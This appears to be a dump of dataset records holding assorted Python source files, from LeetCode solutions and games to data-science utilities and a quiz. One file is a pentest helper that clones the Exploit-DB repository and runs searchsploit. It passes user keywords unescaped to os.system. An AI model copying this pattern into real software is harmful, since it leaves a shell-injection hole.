args.do_train, args.do_eval, args.do_predict, args.do_export)\n\n\nif __name__ == '__main__':\n import os\n\n # set logging level to WARN\n os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\n 
tf.logging.set_verbosity(tf.logging.WARN)\n main()\n","repo_name":"DSXiangLi/SimpleClassification","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9995,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"40"}
+{"seq_id":"6537055998","text":"class Solution:\n def arrangeCoins(self, n: int) -> int:\n #Initialize variables to keep track of what we need. \n #Total will be total coins, totalRows is total complete rows, and x is number of coins per row.\n total = 0\n totalRows = 0\n x = 0\n \n while total <= n:\n #Increase the number of coins per row by one and add it to the total\n x = x+1\n total += x\n #If the total is still less than or equal to n, we have another complete row and can increment totalRows. \n #If not, we do not have a complete row. \n if total <= n:\n totalRows += 1\n \n #Now we can just return totalRows \n return totalRows\n ","repo_name":"EvanJW7/Leetcode","sub_path":"441. Arranging Coins/arrangingCoins.py","file_name":"arrangingCoins.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"9908909070","text":"#Thea Sitek, STKTHE002\r\n#18.05.2014\r\n#Histogram over grades\r\n\r\nmarks = input('Enter a space-separated list of marks: \\n')\r\nmarks = marks.split(' ')\r\n\r\ngrades = ['1','2+','2-','3','F']\r\ncounter = [0,0,0,0,0]\r\n\r\n#convert mark strings into integers\r\nmarksint = []\r\n#...a copy of marks, but with numerical values\r\nfor i in range(len(marks)):\r\n marksint.append(int(marks[i])) \r\n\r\n#tally marks into grade bands \r\nfor i in marksint:\r\n if i > 100 or i < 0:\r\n continue\r\n elif i >= 75:\r\n counter[0] += 1\r\n elif i >= 70:\r\n counter[1] += 1\r\n elif i >= 60:\r\n counter[2] += 1 \r\n elif i >= 50:\r\n counter[3] += 1 \r\n else:\r\n counter[4] += 1\r\n \r\nspace = 2 \r\n#format and print\r\nfor i in range(5):\r\n space -= len(grades[i])\r\n print(grades[i], ' '*space, '|', 'X'*counter[i], sep=\"\")\r\n space = 2\r\n \r\n","repo_name":"MrHamdulay/csc3-capstone","sub_path":"examples/data/Assignment_6/stkthe002/question4.py","file_name":"question4.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"73854224441","text":"import functools\n\ndef async_redis_method(func):\n\n @functools.wraps(func)\n async def wrapper(*args, **kwargs):\n try:\n result = await func(*args, **kwargs)\n except Exception as exc:\n raise ConnectionError('Redis has problems') from exc\n return result\n\n return wrapper\n","repo_name":"fluxx1on/AI-server-app","sub_path":"daemon/utils/redis.py","file_name":"redis.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"10474704839","text":"import unittest\n\nfrom pyramid import testing\n\nfrom dbas.helper.test import verify_dictionary_of_view\n\n\nclass ReviewOngoingViewTests(unittest.TestCase):\n def setUp(self):\n self.config = testing.setUp()\n self.config.include('pyramid_chameleon')\n\n def tearDown(self):\n testing.tearDown()\n\n def test_page(self):\n from dbas.views import ongoing_history as d\n\n request = testing.DummyRequest()\n self.assertEqual(400, d(request).status_code)\n\n def test_page_logged_in(self):\n from dbas.views import ongoing_history as d\n self.config.testing_securitypolicy(userid='Tobias', permissive=True)\n\n request = testing.DummyRequest()\n response = d(request)\n 
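# NOTE (added comment, an assumption): verify_dictionary_of_view appears to assert the keys shared by every D-BAS view dict; the specific keys are then checked below.\n 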
verify_dictionary_of_view(response)\n\n self.assertIn('history', response)\n self.assertTrue(len(response['history']) != 0)\n","repo_name":"wahello/mirror","sub_path":"dbas/views/tests/test_review_ongoing.py","file_name":"test_review_ongoing.py","file_ext":"py","file_size_in_byte":866,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"13152613352","text":"import os\nimport sys\n\nexploit_dir = \"./exploits\"\ngitremote = \"https://github.com/offensive-security/exploit-database.git\"\n\n\n\n####################### DB functions\ndef check_os():\n if os.name == \"posix\":\n return 1\n return 0\n\n\ndef download_db():\n if check_os() == 0:\n print(\"Windows is not supported yet\")\n return\n print(\"abs path: \", os.path.abspath('.'))\n print(\"making directory\")\n os.system(\"mkdir -p {}\".format(exploit_dir))\n os.system(\"ls {}\".format(exploit_dir))\n\n # parsing\n stream = os.popen(\"git rev-parse --is-inside-work-tree\")\n if stream.read() == \"true\":\n print(\"Empty directory. Good to clone\")\n if os.popen(\"ls\").read() == \"\":\n print(\"Cloning Exploit-db Repository ......\")\n os.system(\"git clone {}\".format(gitremote))\n # ok adding\n stream = os.popen(\"git remote -v\")\n if stream.read() != gitremote:\n print(\"adding remote repo {}\".format(gitremote))\n os.system(\"git init > /dev/null\")\n os.system('git remote add origin \"{}\" 2> /dev/null '.format(gitremote))\n # Make sure to prep checkout first\n os.system(\"git checkout -- .\")\n # update from git\n os.system(\"git pull origin master\")\n\n print(\"All installed\")\n\n\ndef update_db():\n os.system(\"cd {}\".format(exploit_dir))\n\n stream = os.popen(\"git remote -v\")\n if stream.read() != gitremote:\n print(\"adding remote repo {}\".format(gitremote))\n os.system(\"git init > /dev/null\")\n os.system(\"git remote add origin {}\".format(gitremote))\n\n os.system(\"git checkout --\")\n\n os.system(\"git pull origin master\")\n\n print(\"Updated\")\n\ndef search_by_keywords(argv):\n print(\"keywords: \", *argv)\n os.system(\"bash {}/exploit-database/searchsploit \".format(os.path.dirname(os.path.realpath(__file__))) + ' '.join(argv))\n","repo_name":"security-anthem/IoTPene","sub_path":"api/exploit_database.py","file_name":"exploit_database.py","file_ext":"py","file_size_in_byte":1951,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"}
+{"seq_id":"617084317","text":"# Write your code here\nimport random\n\ndomino_set = []\ndummy_domino_set = []\nsave_stock_pieces = []\nstock_pieces = []\ncomputer_pieces = []\nplayer_pieces = []\ndomino_snake = []\nstatus = \"Computer\"\n\nsum_com_piece_list = []\nsum_player_piece_list = []\n\n\ndef generate_domino_set():\n global dummy_domino_set\n for x in range(28):\n domino_set.append([])\n for i in range(2):\n domino_set[x].append(random.randint(0, 6))\n dummy_domino_set = domino_set[:]\n return dummy_domino_set\n\n\ndef generate_stock_pieces():\n global save_stock_pieces\n for x in range(14):\n idx = random.randint(0, len(dummy_domino_set) - 1)\n stock_pieces.append(dummy_domino_set[idx])\n dummy_domino_set.pop(idx)\n save_stock_pieces = stock_pieces[:]\n return stock_pieces\n\n\ndef generate_computer_pieces():\n for x in range(7):\n idx = random.randint(0, len(dummy_domino_set) - 1)\n computer_pieces.append(dummy_domino_set[idx])\n dummy_domino_set.pop(idx)\n return computer_pieces\n\n\ndef generate_player_pieces():\n global player_pieces\n 
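# NOTE (added comment, not in the original): 28 tiles minus 14 stock and 7 computer tiles leaves 7, which become the player's hand.\n 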
player_pieces = dummy_domino_set[:]\n return player_pieces\n\n\ndef reshuffle_domino_set():\n global dummy_domino_set\n random.shuffle(domino_set)\n dummy_domino_set = domino_set[:]\n generate_stock_pieces()\n generate_computer_pieces()\n generate_player_pieces()\n\n\ndef find_domino_snake():\n generate_domino_set()\n generate_stock_pieces()\n generate_computer_pieces()\n generate_player_pieces()\n while True:\n global status\n global sum_com_piece_list\n global sum_player_piece_list\n for x in range(7):\n sum_com_piece_list.append(sum(computer_pieces[x]))\n sum_player_piece_list.append(sum(player_pieces[x]))\n max_com_piece = max(sum_com_piece_list)\n max_player_piece = max(sum_player_piece_list)\n\n if max_com_piece != max_player_piece:\n break\n else:\n # generate_domino_set()\n stock_pieces.clear()\n computer_pieces.clear()\n player_pieces.clear()\n sum_player_piece_list.clear()\n sum_com_piece_list.clear()\n reshuffle_domino_set()\n\n if max_com_piece > max_player_piece:\n status = \"player\"\n idx = sum_com_piece_list.index(max_com_piece)\n domino_snake.append(computer_pieces[idx])\n computer_pieces.pop(idx)\n else:\n status = \"computer\"\n idx = sum_player_piece_list.index(max_player_piece)\n domino_snake.append(player_pieces[idx])\n player_pieces.pop(idx)\n\n print(\"Stock pieces: {}\".format(save_stock_pieces))\n print(\"computer pieces: {}\".format(computer_pieces))\n print(\"player pieces: {}\".format(player_pieces))\n print(\"domino snake: {}\".format(domino_snake))\n print(\"status: {}\".format(status))\n\n\n# if __name__ == \"__main__\":\nfind_domino_snake()\n","repo_name":"okornoe/Dominoes","sub_path":"Dominoes/task/dominoes/dominoes.py","file_name":"dominoes.py","file_ext":"py","file_size_in_byte":2894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"44148211070","text":"\"\"\"\nUtility function and operations\n\"\"\"\nimport numpy as np\n\n\nfrom qutip import Qobj\n\nimport tensorflow as tf\n\n\ndef batched_expect(ops, rhos):\n \"\"\"\n Calculates expectation values for a batch of density matrices\n for a set of operators.\n\n Args:\n ops (`tf.Tensor`): a tensor of shape (batch_size, N, hilbert_size,\n hilbert_size) \n of N measurement operators.\n rhos (`tf.Tensor`): a tensor (batch_size, hilbert_size, hilbert_size).\n\n Returns:\n expectations (:class:`tf.Tensor`): A tensor shaped as (batch_size, N)\n representing expectation values for\n the N operators for all the density\n matrices (batch_size).\n \"\"\"\n products = tf.einsum(\"bnij, bjk->bnik\", ops, rhos)\n traces = tf.linalg.trace(products)\n expectations = tf.math.real(traces)\n return expectations\n\n\ndef random_alpha(radius, inner_radius=0):\n \"\"\"\n Generates random complex numbers within a circle.\n\n Args:\n radius (float): Radius for the values\n inner_radius (float): Inner radius which defaults to 0.\n \"\"\"\n radius = np.random.uniform(inner_radius, radius)\n phi = np.random.uniform(-np.pi, np.pi)\n return radius * np.exp(1j * phi)\n\n\ndef dm_to_tf(rhos):\n \"\"\"\n Convert a list of qutip density matrices to TensorFlow\n density matrices\n\n Args:\n rhos (list of `qutip.Qobj`): List of N qutip density matrices\n\n Returns:\n tf_dms (:class:`tf.Tensor`): A tensor of shape (N, hilbert_size,\n hilbert_size)\n of N density matrices.\n \"\"\"\n tf_dms = tf.convert_to_tensor(\n [tf.complex(rho.full().real, rho.full().imag) for rho in rhos]\n )\n return tf_dms\n\n\ndef tf_to_dm(rhos):\n \"\"\"\n Convert a tensorflow density matrix to qutip 
density matrix\n\n Args:\n rhos (`tf.Tensor`): a tensor of shape (N, hilbert_size, hilbert_size)\n representing N density matrices.\n\n Returns:\n rho_gen (list of :class:`qutip.Qobj`): A list of N density matrices.\n\n \"\"\"\n rho_gen = [Qobj(rho.numpy()) for rho in rhos]\n return rho_gen\n\n\ndef clean_cholesky(img):\n \"\"\"\n Cleans an input matrix to make it the Cholesky decomposition matrix T\n\n Args:\n img (`tf.Tensor`): a tensor of shape (batch_size, hilbert_size,\n hilbert_size, 2)\n representing random outputs from a neural network.\n The last dimension is for separating the real and\n imaginary part.\n\n Returns:\n T (`tf.Tensor`): a 3D tensor (N, hilbert_size, hilbert_size)\n representing N matrices used for Cholesky decomp.\n \"\"\"\n real = img[:, :, :, 0]\n imag = img[:, :, :, 1]\n\n diag_all = tf.linalg.diag_part(imag, k=0, padding_value=0)\n diags = tf.linalg.diag(diag_all)\n\n imag = imag - diags\n imag = tf.linalg.band_part(imag, -1, 0)\n real = tf.linalg.band_part(real, -1, 0)\n T = tf.complex(real, imag)\n return T\n\n\ndef density_matrix_from_T(tmatrix):\n \"\"\"\n Gets density matrices from T matrices and normalizes them.\n\n Args:\n tmatrix (`tf.Tensor`): A tensor (N, hilbert_size, hilbert_size)\n representing N valid T matrices.\n\n Returns:\n rho (`tf.Tensor`): A tensor of shape (N, hilbert_size, hilbert_size)\n representing N density matrices.\n \"\"\"\n T = tmatrix\n T_dagger = tf.transpose(T, perm=[0, 2, 1], conjugate=True)\n proper_dm = tf.matmul(T_dagger, T)\n all_traces = tf.linalg.trace(proper_dm)\n all_traces = tf.reshape(1 / all_traces, (-1, 1))\n rho = tf.einsum(\"bij,bk->bij\", proper_dm, all_traces)\n\n return rho\n\n\ndef convert_to_real_ops(ops):\n \"\"\"\n Converts a batch of TensorFlow operators to something that a neural network\n can take as input.\n\n Args:\n ops (`tf.Tensor`): a 4D tensor (batch_size, N, hilbert_size,\n hilbert_size)\n of N measurement operators.\n\n Returns:\n tf_ops (`tf.Tensor`): a 4D tensor (batch_size, hilbert_size,\n hilbert_size, 2*N)\n of N measurement operators converted into real\n matrices.\n \"\"\"\n tf_ops = tf.transpose(ops, perm=[0, 2, 3, 1])\n tf_ops = tf.concat([tf.math.real(tf_ops), tf.math.imag(tf_ops)], axis=-1)\n return tf_ops\n\n\ndef convert_to_complex_ops(ops):\n \"\"\"\n Converts a batch of real-valued operators (as produced for a neural\n network) back into complex TensorFlow operators.\n\n Args:\n ops (`tf.Tensor`): a 4D tensor (batch_size, hilbert_size,\n hilbert_size, 2*N)\n of N measurement operators split into real and\n imaginary parts.\n\n Returns:\n tf_ops (`tf.Tensor`): a 4D tensor (batch_size, N, hilbert_size,\n hilbert_size)\n of N complex measurement operators.\n \"\"\"\n shape = ops.shape\n num_points = shape[-1]\n tf_ops = tf.complex(\n ops[..., : int(num_points / 2)], ops[..., int(num_points / 2) :]\n )\n tf_ops = tf.transpose(tf_ops, perm=[0, 3, 1, 2])\n return tf_ops\n\n\ndef tf_fidelity(A, B):\n \"\"\"Calculates the fidelity between tensors A and B.\n\n Args:\n A, B (tf.Tensor): List of tensors (hilbert_size, hilbert_size).\n\n Returns:\n float: Fidelity between A and B\n \"\"\"\n sqrtmA = tf.matrix_square_root(A)\n temp = tf.matmul(sqrtmA, B)\n temp2 = tf.matmul(temp, sqrtmA)\n fidel = tf.linalg.trace(tf.linalg.sqrtm(temp2)) ** 2\n return tf.math.real(fidel)\n","repo_name":"quantshah/qst-cgan","sub_path":"qst_cgan/ops.py","file_name":"ops.py","file_ext":"py","file_size_in_byte":6052,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"40"}
+{"seq_id":"71730931001","text":"n=5\nstages=[2,1,2,6,2,4,3,3]\n\ndef solution(N,stages):\n answer=[]\n yet=0\n su=len(stages)\n for i in range(1,N+1):\n su-=yet\n yet=stages.count(i)\n if su==0:\n answer.append((0,i))\n else:\n answer.append((yet/su,i))\n answer.sort(key=lambda x:(-x[0],x[1]))\n\n answer=[i[1] for i in answer]\n return answer\nprint(solution(n,stages))\n","repo_name":"Yoo-sumi/CodingTest","sub_path":"Sort_Problem/Q25.py","file_name":"Q25.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"30361067836","text":"#likes\r\ndef likes(names):\r\n if len(names) == 0:\r\n return('no one likes this')\r\n \r\n elif len(names) == 1:\r\n names.append('likes this')\r\n return ' '.join(names)\r\n \r\n elif 1 < len(names) <= 2:\r\n s1 = names[0]\r\n s2 = names[1]\r\n s3 = s1,'and', s2,'like this'\r\n return ' '.join(s3)\r\n \r\n elif len(names) == 3:\r\n s1 = names[0]+\",\"\r\n s2 = names[1]\r\n s3 = names[2]\r\n s4 = s1, s2, 'and', s3, 'like this'\r\n \r\n return ' '.join(s4)\r\n \r\n elif len(names) > 3:\r\n s1 = names[0]+\",\"\r\n s2 = names[1]\r\n s3 = len(names)-2\r\n s3 = str(s3)\r\n s4 = s1, s2, 'and', s3, 'others like this'\r\n \r\n return ' '.join(s4)\r\n pass\r\n","repo_name":"hanifz123/Algorithms","sub_path":"function_likes.py","file_name":"function_likes.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"6821908257","text":"######################### IMPORTS #########################\n\n# Import standard libraries\nimport os\nimport re\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport pandas as pd\nfrom scipy import stats\nimport statsmodels.api as sm\nimport statsmodels.formula.api as smf\nimport matplotlib.pyplot as plt\n\n# Decision Tree and Model Evaluation Imports\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.feature_selection import RFE\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.tree import plot_tree, export_text\n\n# import sklearn.linear_model\nfrom sklearn.linear_model import LassoLars\nfrom sklearn.linear_model import TweedieRegressor\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.linear_model import LinearRegression, Lasso, Ridge, ElasticNet\nfrom sklearn.linear_model import LassoCV, RidgeCV, ElasticNetCV\n\n# import sklearn.metrics\nfrom sklearn.metrics import ConfusionMatrixDisplay\nfrom sklearn.metrics import confusion_matrix \nfrom sklearn.metrics import plot_confusion_matrix \nfrom sklearn.metrics import classification_report \nfrom sklearn.metrics import mean_squared_error, r2_score\n\n# import sklearn.preprocessing\nimport sklearn.preprocessing\nfrom sklearn.preprocessing import MinMaxScaler \nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.preprocessing import RobustScaler\nfrom sklearn.preprocessing import QuantileTransformer\nfrom sklearn.preprocessing import PolynomialFeatures\n\n# Set local state\nα = Alpha = alpha = 0.05\nrandom_state=1992\nnp.random.seed(1992)\n\n# Hides future deprecation warnings\nimport warnings\nwarnings.filterwarnings(\"ignore\") \n\n######################### ACQUIRE DATA #########################\n\ndef get_leam():\n \"\"\"\n This function pulls in the CSV as a DataFrame\n \n Due to latency and timeout issues, the CSV Data 
Pull weblink above must be used to pull the CSV directly.\n The csv should be saved to a local file. Multiple refresh attempts may be required before getting the save file prompt.\n \n GHO Selections: https://apps.who.int/gho/athena/api/GHO\n Homepage: https://www.who.int/data/gho/info/athena-api-examples\n CSV Data Pull: https://apps.who.int/gho/athena/api/GHO/WHOSIS_000001,WHOSIS_000002,WHOSIS_000007,WHOSIS_000015?format=csv\n \"\"\"\n \n df = pd.read_csv('leam.csv')\n\n return df\n\n######################### PREPARE DATA #########################\n\ndef clean_leam(df):\n\n \"\"\"\n This function is used to clean the Life Expectancy And Mortality (LEAM) data as needed, \n ensuring not to introduce any new data but only remove irrelevant data \n or reshape existing data to usable formats.\n \"\"\"\n \n # Drop all columns with more than 10k Null and unneeded features\n df = df.drop(columns=['Low',\n 'High',\n 'StdErr', \n 'StdDev', \n 'Comments', \n 'WORLDBANKINCOMEGROUP'\n ])\n \n # IMPUTE NaN for [COUNTRY] with 'GLOBAL' if [REGION] == 'GLOBAL'\n missing_mask = df['COUNTRY'].isna()\n mapping_dict = dict({'GLOBAL': 'GLOBAL'})\n df.loc[missing_mask, 'COUNTRY'] = df.loc[missing_mask, 'REGION'].map(mapping_dict)\n \n df = df.dropna()\n \n # Create pivot table\n leam_pivot = df.pivot_table(index=['YEAR','COUNTRY','SEX'], columns='GHO', values='Numeric')\n \n # assign pivot to df and reset index\n df = leam_pivot.reset_index()\n \n # Create life_expectancy feature consisting of the mean of individual life expectancy features\n df['life_expectancy'] = df[['WHOSIS_000001','WHOSIS_000002','WHOSIS_000007','WHOSIS_000015']].mean(axis=1)\n \n # Use pandas dummies to pivot features with more than two string values\n # into multiple columns with binary int values that can be read as boolean\n dummy_df = pd.get_dummies(data=df[['SEX']], drop_first=False)\n\n # Concat to leam DataFrame\n df = pd.concat([df, dummy_df], axis=1)\n \n # DROP the original column for redundancy\n df = df.drop(columns=['SEX'])\n \n # Cache a Clean version of my data\n df.to_csv('clean_leam.csv')\n \n return df\n\n \n\n######################### SPLIT DATA #########################\n\ndef split(df, stratify=False, target=None):\n \"\"\"\n This function splits the DataFrame into train, validate, and test\n then prints a graphic representation and a mini report showing the shape of the original DataFrame\n compared to the shape of the train, validate, and test DataFrames.\n \n IMPORTS Required:\n from sklearn.model_selection import train_test_split\n \n ARGUMENTS:\n df - Input the DataFrame you will split\n stratify - True will stratify for your Target (Do NOT stratify on continuous data)\n False will ignore this function\n target - Only needed if you will stratify\n \"\"\"\n \n # Do NOT stratify on continuous data\n if stratify:\n # Split df into train and test using sklearn\n train, test = train_test_split(df, test_size=.2, random_state=1992, stratify=df[target])\n # Split train_df into train and validate using sklearn (stratify on the remaining train rows, not the full df)\n train, validate = train_test_split(train, test_size=.25, random_state=1992, stratify=train[target])\n \n else:\n train, test = train_test_split(df, test_size=.2, random_state=1992)\n train, validate = train_test_split(train, test_size=.37, random_state=1992)\n \n # reset index for train validate and test\n train.reset_index(drop=True, inplace=True)\n validate.reset_index(drop=True, inplace=True)\n test.reset_index(drop=True, inplace=True)\n\n train_prcnt = round((train.shape[0] / df.shape[0]), 2)*100\n validate_prcnt = 
round((validate.shape[0] / df.shape[0]), 2)*100\n test_prcnt = round((test.shape[0] / df.shape[0]), 2)*100\n \n print('________________________________________________________________')\n print('| DF |')\n print('|--------------------:--------------------:--------------------|')\n print('| Train | Validate | Test |')\n print(':--------------------------------------------------------------:')\n print()\n print()\n print(f'Prepared df: {df.shape}')\n print()\n print(f' Train: {train.shape} - {train_prcnt}%')\n print(f' Validate: {validate.shape} - {validate_prcnt}%')\n print(f' Test: {test.shape} - {test_prcnt}%')\n \n \n return train, validate, test\n\ndef viz_split(train, validate, test):\n plt.figure(figsize=(12, 4))\n plt.title('Distribution of train, validate, and test')\n plt.plot(train.index, train.life_expectancy, color='lightgreen')\n plt.plot(validate.index, validate.life_expectancy, color='goldenrod')\n plt.plot(test.index, test.life_expectancy, color='blue', alpha=.5)\n plt.legend(['train', 'validate', 'test'], fontsize=15)\n \n return plt.show()\n\ndef Xy_split(feature_cols, target, train, validate, test):\n \"\"\"\n This function will split the train, validate, and test data by the Feature Columns selected and the Target.\n \n Imports Needed:\n from sklearn.model_selection import train_test_split\n \n Arguments Taken:\n feature_cols: list['1','2','3'] the feature columns you want to run your model against.\n target: list the 'target' feature that you will try to predict\n train: Assign the name of your train DataFrame\n validate: Assign the name of your validate DataFrame\n test: Assign the name of your test DataFrame\n \"\"\"\n \n print('_______________________________________________________________')\n print('| DF |')\n print('|-------------------:-------------------:---------------------|')\n print('| Train | Validate | Test |')\n print('|-------------------:-------------------:---------------------|')\n print('| x_train | y_train | x_val | y_val | x_test | y_test |')\n print(':-------------------------------------------------------------:')\n \n X_train, y_train = train[feature_cols], train[target]\n X_val, y_val = validate[feature_cols], validate[target]\n X_test, y_test = test[feature_cols], test[target]\n\n print()\n print()\n print(f' X_train: {X_train.shape} {X_train.columns}')\n print(f' y_train: {y_train.shape} Index({target})')\n print()\n print(f'X_validate: {X_val.shape} {X_val.columns}')\n print(f'y_validate: {y_val.shape} Index({target})')\n print()\n print(f' X_test: {X_test.shape} {X_test.columns}')\n print(f' y_test: {y_test.shape} Index({target})')\n \n \n return X_train, y_train, X_val, y_val, X_test, y_test\n\n","repo_name":"QMCBT-JustinEvans/project-4_Individual","sub_path":"QMCBT_01_wrangle.py","file_name":"QMCBT_01_wrangle.py","file_ext":"py","file_size_in_byte":8899,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"11573236342","text":"quiz_questions = [\n {\n \"question\": \"What make is the car in which Marty Mcfly uses too\\n\"\n \"travel back in time?\\n\\n\",\n \"answers\": [\"B.M.W\", \"DMC Delorian\", \"Ford\"],\n \"correct\": \"DMC Delorian\"\n },\n {\n \"question\": \"According to Doctor Emmit Brown what makes\\n\"\n \"time travel possible?\\n\\n\",\n \"answers\": [\"The rotation of the earth \",\n \"Newtons law of motion\",\n \"The flux capacitor\"],\n \"correct\": \"The flux capacitor\"\n },\n {\n \"question\": \"How much power does the time machine need\\n\"\n \"to send Marty 
back in time?\\n\\n\",\n \"answers\": [\"1.21 gigawatts\", \"2000 megawatts\", \"55 volts\"],\n \"correct\": \"1.21 gigawatts\"\n },\n {\n \"question\": \"What date does Marty Mcfly travel back to?\\n\\n\",\n \"answers\": [\"September 26th 1989\",\n \"November 5th 1955\",\n \"December 25th 1965\"],\n \"correct\": \"November 5th 1955\"\n },\n {\n \"question\": \"What is the name of the dance Marty attends where\\n\"\n \"his mom and dad kiss for the first time?\\n\\n\",\n \"answers\": [\"The fish under the sea dance\",\n \"The monkey in the jungle dance\",\n \"The enchantment under the sea dance\"],\n \"correct\": \"The enchantment under the sea dance\"\n },\n {\n \"question\": \"What is the name of the mall where Marty meets\\n\"\n \"Doctor Emmit Brown?\\n\\n\",\n \"answers\": [\"Twin Pine Mall\",\n \"Lonely Pine Mall\",\n \"Westfields\"],\n \"correct\": \"Twin Pine Mall\"\n },\n {\n \"question\": \"At what time does the lightning strike the\\n\"\n \"clock tower?\\n\\n\",\n \"answers\": [\"12:00pm\",\n \"10:50am\",\n \"10:04pm\"],\n \"correct\": \"10:04pm\"\n },\n {\n \"question\": \"What is the name of the mayor in Marty's time?\\n\\n\",\n \"answers\": [\"Mayor Goldburge Jenson\",\n \"Mayor Goldie Wilson\",\n \"Mayor Biff Tannen\"],\n \"correct\": \"Mayor Goldie Wilson\"\n },\n {\n \"question\": \"What is the name of the main antagonist?\\n\\n\",\n \"answers\": [\"Geff Bazos\",\n \"Biff Tannen\",\n \"George Mcfly\"],\n \"correct\": \"Biff Tannen\"\n },\n {\n \"question\": \"What is the name of the town Marty lives in?\\n\\n\",\n \"answers\": [\"Hill Valley\",\n \"Springfield\",\n \"Riverdale\"],\n \"correct\": \"Hill Valley\"\n },\n {\n \"question\": \"What song did Marty and his band play for\\n\"\n \"the dance auditions?\\n\\n\",\n \"answers\": [\"I will do anything for love\",\n \"Tainted love\",\n \"Power of love\"],\n \"correct\": \"Power of love\"\n },\n {\n \"question\": \"What is the name of Doc Brown's dog in 1985?\\n\\n\",\n \"answers\": [\"Einstein\",\n \"Tesla\",\n \"Newton\"],\n \"correct\": \"Einstein\"\n },\n {\n \"question\": \"What was the name of Marty's band?\\n\\n\",\n \"answers\": [\"The Who\",\n \"The Hill Valley Rockers\",\n \"The Pinheads\"],\n \"correct\": \"The Pinheads\"\n },\n {\n \"question\": \"What color was Marty's Calvin Klein underwear?\\n\\n\",\n \"answers\": [\"Red\",\n \"White\",\n \"Purple\"],\n \"correct\": \"Purple\"\n },\n {\n \"question\": \"From whom did Doc obtain the plutonium he needed\\n\"\n \"to use the time machine?\\n\\n\",\n \"answers\": [\"Russians\",\n \"English\",\n \"Libyans\"],\n \"correct\": \"Libyans\"\n },\n {\n \"question\": \"What speed does the Delorian need to reach to send\\n\"\n \"someone back or forward in time?\\n\\n\",\n \"answers\": [\"77MPH\", \"78MPH\", \"88MPH\"],\n \"correct\": \"88MPH\"\n },\n {\n \"question\": \"What did Doc Brown hit his head on when he invented\\n\"\n \"the flux capacitor?\\n\\n\",\n \"answers\": [\"The cupboard door in his kitchen\",\n \"The sink in his toilet\",\n \"The bonnet on his car\"],\n \"correct\": \"The sink in his toilet\"\n },\n {\n \"question\": \"What phrase does the Doc repeat throughout\\n\"\n \"the trilogy?\\n\\n\",\n \"answers\": [\"Great Scott!\",\n \"Na-Nu Na-Nu Shazbot\",\n \"Danger, Will Robinson\"],\n \"correct\": \"Great Scott!\"\n },\n {\n \"question\": \"What is the name of Marty's girlfriend\\n\"\n \"in Back to the Future?\\n\\n\",\n \"answers\": [\"Jennifer\",\n \"Alison\",\n \"Betty\"],\n \"correct\": \"Jennifer\"\n },\n {\n \"question\": \"What is Marty's dad's motto 
once he\\n\"\n \"returns back from the past?\\n\\n\",\n \"answers\": [\"With great power comes great responsabilty\",\n \"You put your mind to it you can accomplish anything\",\n \"Justice delayed is justice denied.\"],\n \"correct\": \"You put your mind to it you can accomplish anything\"\n }\n]\n","repo_name":"Harriss1989/MS3_python","sub_path":"questions.py","file_name":"questions.py","file_ext":"py","file_size_in_byte":5143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"28737687961","text":"import argparse\nimport project1\n\nglobal final_data\nif __name__==\"__main__\":\n parser =argparse.ArgumentParser()\n parser.add_argument(\"--input\",type=str,required=True,action='append',help=\"It takes the patterns of the files\")\n parser.add_argument(\"--output\",type=str, required=True,help=\"It takes the output file path\")\n parser.add_argument(\"--names\",action=\"store_true\",help=\"It helps in redacting names\")\n parser.add_argument(\"--genders\",action=\"store_true\",help=\"It helps in redacting genders\")\n parser.add_argument(\"--dates\",action=\"store_true\",help=\"It helps in redacting dates\")\n parser.add_argument(\"--concept\",type=str,action='append',required=True,help=\"It helps in redacting concepts\")\n parser.add_argument(\"--stats\",help=\"It provides the stats of the redacted flags\")\n args=parser.parse_args()\n if args.input:\n final_data=project1.readFiles(args.input)\n #print(final_data)\n if args.names:\n final_data,names_count=project1.redact_names(final_data)\n #print(final_data)\n if args.dates:\n final_data,dates_count=project1.redact_dates(final_data)\n #print(final_data)\n if args.genders:\n final_data,gender_count=project1.redact_genders(final_data)\n #print(final_data)\n if args.concept:\n #print(args.concept)\n final_data,redacted_sentences_list,concept_words=project1.redact_concept(final_data,args.concept)\n if args.stats:\n project1.stats(args.stats)\n if args.output:\n #print(final_data)\n project1.write_output(final_data,args.output)\n\n","repo_name":"Nithivarn-Reddy/Redactor","sub_path":"project1/redactor.py","file_name":"redactor.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"30026951072","text":"import gmsh\nimport sys\n\ngmsh.initialize(sys.argv)\n\nt2 = gmsh.view.add(\"Second order quad\")\n\n# coordinates of 4 quad nodes\nquad = [0., 1., 1., 0., # x\n -1.2, -1.2, -0.2, -0.2, # y\n 0., 0., 0., 0.] 
